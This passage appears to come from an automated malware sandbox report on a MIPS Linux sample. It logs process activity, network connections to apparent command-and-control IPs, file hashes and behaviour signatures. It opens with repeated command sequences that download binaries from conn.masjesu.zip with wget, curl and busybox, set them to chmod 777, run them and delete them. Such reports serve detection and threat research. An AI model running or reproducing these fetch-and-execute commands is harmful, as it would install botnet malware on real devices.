[wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 02:13
Reported
2024-10-28 02:15
Platform
debian9-mipsel-20240611-en
Max time kernel
102s
Max time network
100s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
